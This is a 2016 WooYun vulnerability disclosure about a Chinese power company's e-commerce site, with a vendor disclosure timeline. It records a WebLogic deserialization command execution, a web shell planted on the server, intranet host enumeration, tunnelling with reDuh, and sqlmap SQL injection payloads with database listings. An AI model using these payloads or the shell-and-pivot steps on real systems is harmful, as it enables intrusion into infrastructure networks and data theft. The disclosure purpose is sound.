当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0191172

漏洞标题:山西漳泽电力某站点命令执行\SQL注入(影响内网安全)

相关厂商:山西漳泽电力股份有限公司

漏洞作者: 路人甲

提交时间:2016-03-31 21:20

修复时间:2016-05-19 23:30

公开时间:2016-05-19 23:30

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-31: 细节已通知厂商并且等待厂商处理中
2016-04-04: 厂商已经确认,细节仅向厂商公开
2016-04-14: 细节向核心白帽子及相关领域专家公开
2016-04-24: 细节向普通白帽子公开
2016-05-04: 细节向实习白帽子公开
2016-05-19: 细节向公众公开

简要描述:

漳泽电力

详细说明:

漳泽电力电子商务网
http://**.**.**.**/
weblogic反序列化漏洞

以太网适配器 本地连接 2:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::7dc9:1f04:7405:173e%13
IPv4 地址 . . . . . . . . . . . . : **.**.**.**
子网掩码 . . . . . . . . . . . . : **.**.**.**
默认网关. . . . . . . . . . . . . : **.**.**.**


写入shell:http://**.**.**.**/Liems/111.jspx

服务器名称            注解
------------------------------------------
\\AHB-WZ
\\AHB_LHZ
\\AHB_LYJ
\\AHB_LYQ
\\ASB_MXP
\\BGS_CL杨小军 杨小军
\\BGS_LY
\\CHINA-20121030O
\\DQB_MQ 123456
\\GSLD-WSY
\\HP-DFKCFOQQM81X
\\JHB_HP
\\JHB_QPL
\\JHB_RB
\\LENOVO-CF47097F
\\LENOVO-F7918C2C
\\RZB-HH 人事劳动部(黄华)
\\SERVER
\\TYXXPT-SJK
\\ZHKFB-LHS zhkfb-lhs
\\ZZDL
\\ZZDL-CWB
命令成功完成。
>net view /domain
Domain
------------------------------------------
MSHOME
WORKGROUP
ZDZB
人事劳动部
新闻中心
营销部
命令成功完成。


数据库user与pass相同,翻看了一下数据库,基本上都是五金的订单什么的,没有太多有用的信息

数据库.png


之后使用reduh连接远程,可进行内网渗透

远程1.png


扫描部分内网端口

内网2.png


内网3.png


内网4.png


内网1.png


记着以前乌云上还有一个关于打印机渗透的,找了没找到

打印机.png


数百个公司的联系方式

xls.png

漏洞证明:

SQl注入

http://**.**.**.**/Liems/portal/detailCgxx.jsp?id=5237&name=ZC&type=ALL


1.png


2.png


Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://**.**.**.**:80/Liems/portal/detailCgxx.jsp?id=5237 and 1=1 AND 6894=6894&name=ZC&type=ALL
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: http://**.**.**.**:80/Liems/portal/detailCgxx.jsp?id=5237 and 1=1 AND 6637=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(69)||CHR(118)||CHR(110),5)&name=ZC&type=ALL
Type: UNION query
Title: Generic UNION query (NULL) - 15 columns
Payload: http://**.**.**.**:80/Liems/portal/detailCgxx.jsp?id=5237 and 1=-1748 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(113)||CHR(106)||CHR(112)||CHR(113)||CHR(102)||CHR(77)||CHR(99)||CHR(103)||CHR(85)||CHR(65)||CHR(67)||CHR(67)||CHR(68)||CHR(76)||CHR(118)||CHR(90)||CHR(117)||CHR(81)||CHR(98)||CHR(87)||CHR(82)||CHR(74)||CHR(76)||CHR(99)||CHR(114)||CHR(87)||CHR(103)||CHR(109)||CHR(117)||CHR(112)||CHR(81)||CHR(118)||CHR(83)||CHR(113)||CHR(109)||CHR(120)||CHR(116)||CHR(113)||CHR(80)||CHR(68)||CHR(68)||CHR(115)||CHR(117)||CHR(111)||CHR(113)||CHR(118)||CHR(113)||CHR(107)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- -&name=ZC&type=ALL
---
web application technology: Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Oracle
available databases [19]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] LIEMS5
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB


Database: LIEMS5
+----------------------------+---------+
| Table | Entries |
+----------------------------+---------+
| PGFLBMST | 184428 |
| INTERFACE_REC | 179147 |
| PTPTSMST | 174297 |
| POQTVMST | 172018 |
| INTERFACE_PRC | 158603 |
| INTERFACE_REQ | 120547 |
| ACTIONLOG | 119342 |
| PGPRTORGASSIGN | 118573 |
| PGPRTORGLNK | 118567 |
| DKONLINEUSERHISMST | 114881 |
| BDPRHJMST | 91138 |
| INTERFACE_PLA | 86087 |
| INTERFACE_ILD | 76712 |
| INTERFACE_POH | 69817 |
| BDPDTTYPELIN | 65958 |
| INLS_REC | 43707 |
| DKTREEMENUTMP | 43692 |
| INLS_PRC | 33576 |
| POPLALIN | 31068 |
| INLS_ILD | 29976 |
| BDWZQDLIN | 29685 |
| POQTLMST | 29543 |
| POQTPMST | 25514 |
| CMPMAMST | 24171 |
| INLS_REQ | 24144 |
| POPOLMST | 23627 |
| DKDOCMST | 22602 |
| PORTLETOBJPRE | 22417 |
| INLS_POH | 20025 |
| BDSYGYSLIN | 19862 |
| INTERFACE_PMA | 17973 |
| DKFLDMST | 17491 |
| PTPARTORGLINK | 15874 |
| BDZZFILEMST | 13377 |
| MSMENUOPERMST | 12613 |
| PORTLETOBJECT | 11214 |
| BDTODOMST | 8144 |
| INLS_PTS | 7648 |
| PGPRTLIN | 7636 |
| BDVENBMMST | 7031 |
| LPNOTEBOOKMST | 6391 |
| DKROLEPERLNK | 6319 |
| POPOHMST | 6189 |
| BDCGYTODOMST | 5801 |
| POPLAMST | 5792 |
| BDXMLXMST | 5780 |
| POQTHMST | 5687 |
| POQTOMST | 5501 |
| PGMSGMST | 5434 |
| BDZBGGMST | 5045 |
| PGPGMMST | 4606 |
| BDWEBTBRMST | 4353 |
| BDCGQDLIN | 3778 |
| PGLIMITPERMST | 3385 |
| PORTALTAB | 2901 |
| PORTAL | 2774 |
| PORTALROLE | 2774 |
| CMEMPMST | 2718 |
| CMEMPPOSMST | 2690 |
| DKPERSTLIN | 2502 |
| PGPRTMST | 2387 |
| DKKJGROUPMST | 2360 |
| QUVDVENMST | 2294 |
| PGSGPLNK | 1904 |
| BDVENBGHISMST | 1596 |
| COPY_EM_PGPGMMST | 1485 |
| MSOPTMST | 1301 |
| DKPOPMST | 1239 |
| DKRELMST | 1179 |
| PGSGRMST | 1155 |
| DKSEQMST | 1038 |
| DKTBLMST | 1029 |


修复方案:

修复吧

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2016-04-04 23:24

厂商回复:

最新状态:

暂无